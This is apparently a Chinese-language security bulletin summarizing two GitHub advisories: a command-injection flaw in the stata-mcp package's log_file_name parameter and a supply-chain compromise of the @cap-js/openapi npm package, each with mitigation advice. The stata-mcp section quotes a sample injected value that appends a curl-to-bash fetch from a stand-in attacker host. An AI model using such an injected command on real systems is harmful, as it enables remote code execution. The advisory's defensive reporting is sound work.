GHSA-4p62-hqp5-g644:stata-mcp 套件的命令注入漏洞,log_file_name 參數未驗證
GitHub Advisory Database · 2026-06-04
GitHub Advisory Database 於 2026 年 6 月 4 日發布 GHSA-4p62-hqp5-g644,評級 Critical,影響 PyPI 上的 stata-mcp 套件。漏洞位於 Stata 指令包裝器(command wrapper)的 log_file_name 參數,攻擊者可透過在 log 檔案路徑中注入 shell 元字元,在執行 Stata 指令的系統上實現任意命令執行(RCE)。
漏洞機制
stata-mcp 是一個讓 MCP 工具(Model Context Protocol)驅動 Stata 統計軟體的 Python 套件。其 log 路徑參數被直接拼接進 shell 命令字串,未經任何 shell 轉義或白名單驗證。攻擊者控制 log_file_name 值後,可傳入如 /tmp/x; curl attacker.com/shell.sh | bash 的字串,讓外部命令在 Stata 程序的權限下執行。由於 MCP 服務通常以服務帳號或開發者的本地帳號運行,權限提升路徑取決於部署環境——在研究機構或資料分析環境中風險尤高。
受影響版本
受影響的具體版本範圍在公告發布時尚未完整列出,使用者應查看 GHSA-4p62-hqp5-g644 的最新版本標記。建議立即停止在生產或多用戶環境中暴露此 MCP 端點,直到修補版本可用。
修補與緩解
- 等待維護者發布修補版本,持續監看
https://github.com/advisories/GHSA-4p62-hqp5-g644 - 短期緩解:限制
log_file_name只接受白名單內的路徑,或在套件外層以shlex.quote()對參數進行 shell 轉義 - 隔離 MCP 服務,確保 Stata MCP 不對外暴露未驗證的輸入,尤其在 JupyterHub 或多租戶研究環境中
GHSA-jpvj-wpmj-h7rv:@cap-js/openapi npm 套件供應鏈入侵,Critical 評級
GitHub Advisory Database · 2026-06-04
GitHub Advisory Database 同日發布 GHSA-jpvj-wpmj-h7rv,評級 Critical,確認 npm 套件 @cap-js/openapi 遭到供應鏈入侵(supply chain compromise)。該套件是 SAP Cloud Application Programming(CAP)框架的 OpenAPI 整合元件,廣泛用於企業應用開發。
漏洞機制
供應鏈入侵的典型手法是攻擊者取得套件發佈憑證(npm publish token)或入侵維護者帳號後,上傳包含惡意 payload 的版本。惡意版本的 postinstall 腳本或模組初始化程式碼在安裝時或首次 require() 時執行,常見 payload 包含:資料外洩(竊取環境變數、SSH key、AWS 憑證)、持久化後門、或加密貨幣挖礦。供應鏈攻擊的特殊危險性在於它在 CI/CD 管道中靜默執行,開發者往往在部署前毫無感知。
受影響版本
公告發布時受影響的具體版本範圍尚在調查中。所有使用 @cap-js/openapi 的專案應立即:
- 執行
npm audit並檢查GHSA-jpvj-wpmj-h7rv - 檢查
package-lock.json中的已安裝版本,比對 advisory 中列出的受影響版本範圍 - 審查 CI/CD 環境中的環境變數,評估是否可能已外洩
修補與緩解
更新至 SAP 官方發布的乾淨版本。若組織使用 Artifact Registry 或 Artifactory 等私有 registry,應拉取最新版本後重新掃描。凡在受影響版本安裝期間存在的憑證(API keys、部署 token、資料庫密碼)均應視為已洩露並立即輪替,這是供應鏈入侵事件的標準處置原則,優先於確認 payload 是否真的執行。